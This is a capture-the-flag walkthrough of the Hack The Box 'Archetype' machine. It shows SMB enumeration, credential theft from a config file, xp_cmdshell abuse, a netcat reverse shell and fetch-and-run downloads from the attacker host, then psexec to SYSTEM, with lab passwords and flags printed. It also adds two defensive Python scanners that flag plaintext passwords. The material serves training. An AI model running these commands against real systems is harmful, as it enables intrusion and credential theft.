Deep Dive into HTB – Hack The Box – Tier 2 – Challenge 1 – Archetype

Part of our extensive “HTB – Hack the Box Series” – Explore the full series.

Initial Setup and Recon

First, ensure your Kali Linux is up-to-date:

sudo apt update
sudo apt full-upgrade -y

Establish a VPN connection to integrate with the HTB environment:

sudo openvpn Downloads/starting_point_UserName.ovpn

Perform reconnaissance using Nmap to identify service versions and open ports:

sudo nmap -sC -sV 10.129.110.165

Exploring SMB Shares

Analyze the SMB service for potential security lapses. Use ‘smbclient’ for share enumeration:

smbclient -N -L \\\\10.129.149.79\\

Investigate the ‘backups’ share as it lacks administrative protection:

smbclient -N \\\\10.129.149.79\\backups

File Analysis and Password Extraction

Retrieve sensitive configuration files from the share and extract crucial credentials:

get prod.dtsConfig

Analyze the ‘prod.dtsConfig’ file to uncover the password:

cat prod.dtsConfig

Utilizing Impacket for MSSQL Interaction

Deploy Impacket’s ‘mssqlclient.py’ for authenticated interactions with the Microsoft SQL Server:

/usr/bin/impacket-mssqlclient ARCHETYPE/sql_svc@10.129.149.79 -windows-auth

Windows Command Execution via SQL Server

Exploit the ‘xp_cmdshell’ extended stored procedure for command execution. It is disabled by default; mssqlclient’s ‘enable_xp_cmdshell’ turns it on through sp_configure followed by RECONFIGURE, a configuration change that SQL Server records in its error log and that defenders can alert on:

xp_cmdshell "whoami"

Netcat for Shell Access

Transfer Netcat to the target and use it to obtain a reverse shell. The ‘wget’ below runs inside PowerShell on the target, where it is an alias of Invoke-WebRequest (hence the ‘-outfile’ switch):

wget http://10.10.14.217/nc.exe -outfile nc.exe

Execute the binary to initiate a reverse shell:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.14.217 4444"

Privilege Escalation with winPEAS

Download and execute winPEAS for privilege escalation opportunities:

wget http://10.10.14.217/winPEASx64.exe -outfile winpeas.exe

Run winPEAS to identify potential vulnerabilities for escalation:

.\winpeas.exe

Final Steps to System Access

Use discovered credentials for further system access and capture the user and root flags:

psexec.py administrator@10.129.149.79

Conclusion

This tutorial provided a technical walkthrough of the ‘Archetype’ challenge in HTB. Remember, these skills should be applied in ethical hacking scenarios to strengthen cybersecurity defenses.

Step-by-Step detailed tutorial

└─$ sudo nmap -sC -sV 10.129.110.165
[sudo] password for toor: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-05 07:23 EDT
Nmap scan report for 10.129.110.165
Host is up (0.045s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
  • Task 1 – Which TCP port is hosting a database server? – 1433

Enumerate the SMB server’s shares using the “smbclient” tool: “-N” suppresses the password prompt (a null session) and “-L” lists the shares the server offers.

┌──(toor㉿kali)-[~]
└─$ smbclient -N -L \\\\10.129.149.79\\

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.149.79 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The only share that is not Admin protected is “backups”, let’s check it out.

┌──(toor㉿kali)-[~]
└─$ smbclient -N \\\\10.129.149.79\\backups
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

                5056511 blocks of size 4096. 2544287 blocks available
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
smb: \> exit
                                                                                                                                                 
┌──(toor㉿kali)-[~]
└─$ 

 

  • Task 2 – What is the name of the non-Administrative share available over SMB? – backups
  • Task 3 – What is the password identified in the file on the SMB share? – M3g4c0rp123
┌──(toor㉿kali)-[~]
└─$ ls    
allowed.userlist         Desktop    Downloads  Music    open.sh  Pictures        Public     three   worknotes.txt
allowed.userlist.passwd  Documents  hash       new.req  pass     prod.dtsConfig  Templates  Videos
                                                                                                                                                 
┌──(toor㉿kali)-[~]
└─$ cat prod.dtsConfig 
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>                                                                                                                                                 
┌──(toor㉿kali)-[~]
└─$ 
echo "Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc" > user.txt
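The file above is a standard SSIS package configuration, and its connection string carries the password in clear text. As an added example (not from the original post), the Python audit below parses that DTSConfiguration layout and flags every connection string with a plaintext password or Persist Security Info=True; the sample XML is constructed on the same layout, with a placeholder password and an extra integrated-auth connection for contrast.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the prod.dtsConfig layout from the box; the
# password is a placeholder and a second, integrated-auth connection is added.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=PLACEHOLDER_PW;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

SECRET_KEYS = ("password", "pwd")  # OLE DB accepts either spelling


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased name."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def audit_dtsconfig(xml_text):
    """One finding per Configuration element whose Path targets a ConnectionString."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if "ConnectionString" not in path:
            continue
        node = conf.find("ConfiguredValue")
        cs = parse_connection_string(node.text or "") if node is not None else {}
        findings.append({
            "path": path,
            "user": cs.get("user id") or cs.get("uid"),
            # the defect that let the box fall: a password in a file on a null-session share
            "plaintext_password": any(cs.get(k) for k in SECRET_KEYS),
            # True keeps the password inside the connection object after it opens
            "persist_security_info": cs.get("persist security info", "").lower() == "true",
            "integrated_security": bool(cs.get("integrated security")),
        })
    return findings


if __name__ == "__main__":
    for f in audit_dtsconfig(SAMPLE_DTSCONFIG):
        verdict = "FAIL" if f["plaintext_password"] else "ok"
        print(f"[{verdict}] {f['path']} user={f['user']} persist={f['persist_security_info']}")
```

Run it over every .dtsConfig found on file shares; the Destination entry fails and the Source entry, which uses Integrated Security, passes.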
  • Task 4 – What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? – mssqlclient.py
  • https://github.com/SecureAuthCorp/impacket
  • https://www.secureauth.com/labs/open-source-tools/impacket/
┌──(toor㉿kali)-[~/archetype/impacket/impacket/examples]
└─$ sudo updatedb.plocate
                                                                                        
┌──(toor㉿kali)-[~/archetype/impacket/impacket/examples]
└─$ locate mssqlclient                               
/home/toor/archetype/impacket/examples/mssqlclient.py
/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py

 

┌──(toor㉿kali)-[~]
└─$ /usr/bin/impacket-mssqlclient ARCHETYPE/sql_svc@10.129.149.79 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> xp_cmdshell "whoami"
output                                                                             

--------------------------------------------------------------------------------   

archetype\sql_svc                                                                  

NULL                                                                               

SQL> 
  • Locate the binaries for Netcat
┌──(toor㉿kali)-[~]
└─$ locate nc.exe     
/home/toor/three/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
                                                                                    
┌──(toor㉿kali)-[~]
└─$
  • copy nc.exe to the working directory
┌──(toor㉿kali)-[~]
└─$ pwd
/home/toor
                                                                                    
┌──(toor㉿kali)-[~]
└─$ cp -p /usr/share/windows-resources/binaries/nc.exe /home/toor
                                                                                    
┌──(toor㉿kali)-[~]
└─$ ls           
allowed.userlist         Documents  nc.exe   Pictures        three
allowed.userlist.passwd  Downloads  new.req  prod.dtsConfig  user.txt
archetype                hash       open.sh  Public          Videos
Desktop                  Music      pass     Templates       worknotes.txt
                                                                                    
┌──(toor㉿kali)-[~]
└─$ 
  • run a webserver on your Kali machine serving on port 80
┌──(toor㉿kali)-[~]
└─$ sudo python3 -m http.server 80
[sudo] password for toor: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
  • find your “tun0” OpenVPN IP: 10.10.14.217
┌──(toor㉿kali)-[~]
└─$ ifconfig

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.14.217  netmask 255.255.254.0  destination 10.10.14.217
        inet6 dead:beef:2::10d7  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::e4af:3b51:736e:118a  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 1193  bytes 63637 (62.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1250  bytes 67366 (65.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                          
┌──(toor㉿kali)-[~]
└─$ 
  • Return to the target machine and “wget” the “nc.exe” binary file (in PowerShell, “wget” is an alias of Invoke-WebRequest)
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.217/nc.exe -outfile nc.exe"
output
--------------------------------------------------------------------------------   
NULL                                                                               
SQL>
  • Confirmation that the file was transferred can be observed in the terminal running the web server on the Kali machine
┌──(toor㉿kali)-[~]
└─$ sudo python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.149.79 - - [05/Nov/2022 12:33:11] "GET /nc.exe HTTP/1.1" 200 -
  • setup a Netcat listener on the Kali machine
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
  • Return to the target machine and execute a command similar to the previous one
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.14.217 4444"
  • On the Kali machine, the terminal with the nc listener will show this
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.217] from (UNKNOWN) [10.129.149.79] 49681
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>
  • Task 5 – What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? – xp_cmdshell
  • Task 6 – What script can be used in order to search possible paths to escalate privileges on Windows hosts? –
  • https://github.com/carlospolop/PEASS-ng.git
  • https://github.com/carlospolop/PEASS-ng/releases/tag/20221102
  • On the Kali machine, download the file “winPEASx64.exe” from the GitHub Releases page, place it in the working directory, and start a new web server.
┌──(toor㉿kali)-[~]
└─$ sudo python3 -m http.server 80
[sudo] password for toor: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.149.79 - - [05/Nov/2022 13:41:55] "GET /winPEASx64.exe HTTP/1.1" 200 -
  • On the target machine, at the PowerShell prompt, download the winPEAS file from the Kali machine
PS C:\Users\sql_svc\Desktop> wget http://10.10.14.217/winPEASx64.exe -outfile winpeas.exe
wget http://10.10.14.217/winPEASx64.exe -outfile winpeas.exe
PS C:\Users\sql_svc\Desktop>
  • Run “winpeas” and check for identified files
Found History Files
File: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
  • Task 7 – What file contains the administrator’s password? – ConsoleHost_history.txt
PS C:\Users\sql_svc\Desktop> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\sql_svc\Desktop>
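ConsoleHost_history.txt is where PSReadLine persists every interactive command, so a password typed on a “net use” line survives there long after the session. As an added example (not from the original post), the Python scanner below finds that pattern, plus the generic inline-password forms, in a history file and reports each hit with the secret redacted; the sample history and its passwords are constructed.

```python
import re

# Constructed sample history: the net use line mirrors the one recovered on the
# box with a placeholder password; the other lines exercise the non-leaking
# ('*' prompts for the password) and generic inline-password cases.
SAMPLE_HISTORY = """cd C:\\Users\\sql_svc\\Downloads
net.exe use T: \\\\Archetype\\backups /user:administrator PLACEHOLDER_PW
net use S: \\\\fileserver\\share /user:CORP\\svc_backup *
sqlcmd -S . -U sa -P PLACEHOLDER_SA
exit
"""

# net use [drive:] \\server\share /user:NAME [PASSWORD | *] [/persistent:...]
NET_USE = re.compile(r"^\s*net(?:\.exe)?\s+use\b(?P<args>.*)$", re.IGNORECASE)
USER_ARG = re.compile(r"/user:(?P<user>\S+)(?:\s+(?P<pw>\S+))?", re.IGNORECASE)
# Generic forms: password=..., pwd=..., /pass:..., -p ... (heuristic, expect some noise)
GENERIC = re.compile(r"(?:password|pwd|/pass|-p)[=: ]\s*(?P<pw>\S+)", re.IGNORECASE)


def scan_history(text):
    """Return (line_no, kind, user, redacted_line) for each command that embeds a secret.

    A trailing '*' means net use prompted for the password, so nothing was
    written to the history file and that line is not reported."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = NET_USE.match(line)
        if m:
            u = USER_ARG.search(m.group("args"))
            pw = u.group("pw") if u else None
            if pw and pw != "*" and not pw.startswith("/"):
                findings.append((n, "net use", u.group("user"), line.replace(pw, "<redacted>")))
            continue
        g = GENERIC.search(line)
        if g:
            findings.append((n, "inline password", None, line.replace(g.group("pw"), "<redacted>")))
    return findings


if __name__ == "__main__":
    for n, kind, user, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: {kind} user={user}: {redacted}")
```

For service accounts that never need interactive history, Set-PSReadLineOption -HistorySaveStyle SaveNothing stops the file from being written at all.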
  • With the newly identified username and password we will use another tool “psexec”
┌──(toor㉿kali)-[~]
└─$ locate psexec
/home/toor/archetype/impacket/examples/psexec.py
/usr/bin/impacket-psexec
┌──(toor㉿kali)-[~]
└─$ /usr/bin/impacket-psexec administrator@10.129.149.79
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.149.79.....
[*] Found writable share ADMIN$
[*] Uploading file inETVhrC.exe
[*] Opening SVCManager on 10.129.149.79.....
[*] Creating service RJnn on 10.129.149.79.....
[*] Starting service RJnn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd ..
 
C:\Windows> cd ..
 
C:\> cd Users
 
C:\Users> cd Administrator
 
C:\Users\Administrator> cd Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\Administrator\Desktop

07/27/2021  02:30 AM    <DIR>          .
07/27/2021  02:30 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,709,221,376 bytes free

C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528
C:\Users\Administrator\Desktop> 
  • User Flag – 3e7b102e78218e935bf3f4951fec21a3
┌──(toor㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.217] from (UNKNOWN) [10.129.149.79] 49681
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>cd ..
cd ..

C:\Users\sql_svc>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc

01/20/2020  06:01 AM    <DIR>          .
01/20/2020  06:01 AM    <DIR>          ..
01/20/2020  06:01 AM    <DIR>          3D Objects
01/20/2020  06:01 AM    <DIR>          Contacts
01/20/2020  06:42 AM    <DIR>          Desktop
01/20/2020  06:01 AM    <DIR>          Documents
11/05/2022  09:33 AM    <DIR>          Downloads
01/20/2020  06:01 AM    <DIR>          Favorites
01/20/2020  06:01 AM    <DIR>          Links
01/20/2020  06:01 AM    <DIR>          Music
01/20/2020  06:01 AM    <DIR>          Pictures
01/20/2020  06:01 AM    <DIR>          Saved Games
01/20/2020  06:01 AM    <DIR>          Searches
01/20/2020  06:01 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  10,713,702,400 bytes free

C:\Users\sql_svc>cd Desktop
cd Desktop

C:\Users\sql_svc\Desktop>dir 
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,713,702,400 bytes free

C:\Users\sql_svc\Desktop>type user.txt
type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>
  • Root Flag: b91ccec3305e98240082d4474b848528
  • https://www.hackthebox.com/achievement/machine/303878/287
Cogeanu Marius
https://cogeanu.com
